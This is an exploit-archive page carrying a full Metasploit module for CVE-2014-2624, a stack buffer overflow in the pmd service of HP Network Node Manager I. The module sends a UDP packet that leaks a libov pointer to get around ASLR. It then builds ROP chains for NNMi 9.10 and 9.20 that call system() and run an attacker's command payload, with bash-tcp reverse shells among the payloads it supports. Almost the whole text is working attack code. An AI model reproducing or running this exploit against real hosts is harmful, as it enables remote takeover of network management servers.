what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Network Node Manager I PMD Buffer Overflow

HP Network Node Manager I PMD Buffer Overflow
Posted Sep 30, 2014
Authored by juan vazquez, d(-_-)b | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stack_option packets with user controlled data. In order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from the stack and finally build the rop chain to avoid NX.

tags | exploit, overflow
advisories | CVE-2014-2624
SHA-256 | ed8dcf6077fc962dee63928b9374f08f765d9613b6097985fa09b44f33f8d338

HP Network Node Manager I PMD Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'HP Network Node Manager I PMD Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
vulnerability exists in the pmd service, due to the insecure usage of functions like
strcpy and strcat while handling stack_option packets with user controlled data. In
order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
the stack and finally build the rop chain to avoid NX.
},
'Author' =>
[
'd(-_-)b', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2624'],
['ZDI', '14-305']
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 3000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
}
},
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Targets' =>
[
['Automatic', {}],
['HP NNMi 9.10 / CentOS 5',
{
# ptr to .rodata with format specifier
#.rodata:0003BE86 aS_1 db '%s',0
'ov_offset' => 0x3BE86,
:rop => :rop_hp_nnmi_9_10
}
],
['HP NNMi 9.20 / CentOS 6',
{
# ptr to .rodata with format specifier
#.rodata:0003C2D6 aS_1 db '%s',0
'ov_offset' => 0x3c2d8,
:rop => :rop_hp_nnmi_9_20
}
]
],
'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
'DisclosureDate' => 'Sep 09 2014',
'DefaultTarget' => 0
))

register_options([ Opt::RPORT(7426) ], self.class)
end

def check
header = [
0x2a5, # pmdmgr_init pkt
0x3cc, # signature
0xa0c, # signature
0xca8 # signature
].pack("V")

data = "\x00" * (0xfa4 - header.length)

pkt = header + data

connect_udp
udp_sock.put(pkt)
res = udp_sock.timed_read(8, 1)
if res.blank?
# To mitigate MacOSX udp sockets behavior
# see https://dev.metasploit.com/redmine/issues/7480
udp_sock.put(pkt)
res = udp_sock.timed_read(8)
end
disconnect_udp

if res.blank?
return Exploit::CheckCode::Unknown
elsif res.length == 8 && res.unpack("V").first == 0x2a5
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end

def exploit
connect_udp
# info leak with a "proto_tbl" packet
print_status("Sending a 'proto_tbl' request...")
udp_sock.put(proto_tbl_pkt)

res = udp_sock.timed_read(13964, 1)
if res.blank?
# To mitigate MacOSX udp sockets behavior
# see https://dev.metasploit.com/redmine/issues/7480
udp_sock.put(proto_tbl_pkt)
res = udp_sock.timed_read(13964)
end

if res.blank?
fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
end

if target.name == 'Automatic'
print_status("Fingerprinting target...")
my_target = auto_target(res)
fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
else
my_target = target
fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
end

print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")

# exploit with a "stack_option_pkt" packet
udp_sock.put(stack_option_pkt(my_target, @ov_base))

disconnect_udp
end

def rop_hp_nnmi_9_10(ov_base)
rop = rand_text_alpha(775)
rop << [0x808d7c1].pack("V") # pop ebx ; pop ebp ; ret
rop << [ov_base + 0x481A8].pack("V") # ebx: libov .got
rop << [0x8096540].pack("V") # ptr to .data where user controlled string will be stored:
# "PMD Stack option specified, but stack not available (user_controlled)"
rop << [0x808d7c2].pack("V") # pop ebp # ret
rop << [0x08096540 + 4732].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
rop << [ov_base + 0x1D692].pack("V") # ptr to 'call _system' sequence:
#.text:0001D692 lea eax, [ebp+dest]
#.text:0001D698 push eax ; command
#.text:0001D699 call _system
rop
end

def rop_hp_nnmi_9_20(ov_base)
rop = rand_text_alpha(775)
rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
#.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)
#.text:0001DAEC push eax ; command
#.text:0001DAED call _system
rop << [0x08097160].pack("V") # ebx: ptr to .data where user controlled string will be stored:
# "PMD Stack option specified, but stack not available (user_controlled)"
rop << rand_text_alpha(4) # ebp: padding
rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret
rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
rop << rand_text_alpha(4) # ebx: padding
rop << [0x8097160 + 4764].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
rop << [0x805a58d].pack("V") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
rop << [0x80528BC].pack("V") # jmp eax

rop
end

def stack_option_pkt(t, ov_base)
hdr = [0x2a9].pack("V") # stack_option packet
data = "-SA" # stack name (invalid one 'A')
data << ";" # separator
data << self.send(t[:rop], ov_base) # malformed stack options
data << payload.encoded
data << ";\n"
data << "\x00" * (0xfa4 - data.length - hdr.length)

hdr + data
end

def proto_tbl_pkt
hdr = [0x2aa].pack("V") # proto_tbl packet
data = "\x00" * (0xfa4 - hdr.length)

hdr + data
end

def base(address, offset)
address - offset
end

def find_ov_base(t, data)
print_status("Searching #{t.name} pointers...")
i = 0
data.unpack("V*").each do |int|
if base(int, t['ov_offset']) % 0x1000 == 0
print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
@ov_base = base(int, t['ov_offset'])
return true
end
i = i + 1
end

false
end

def auto_target(data)
targets.each do |t|
next if t.name == 'Automatic'
if find_ov_base(t, data)
return t
end
end

nil
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close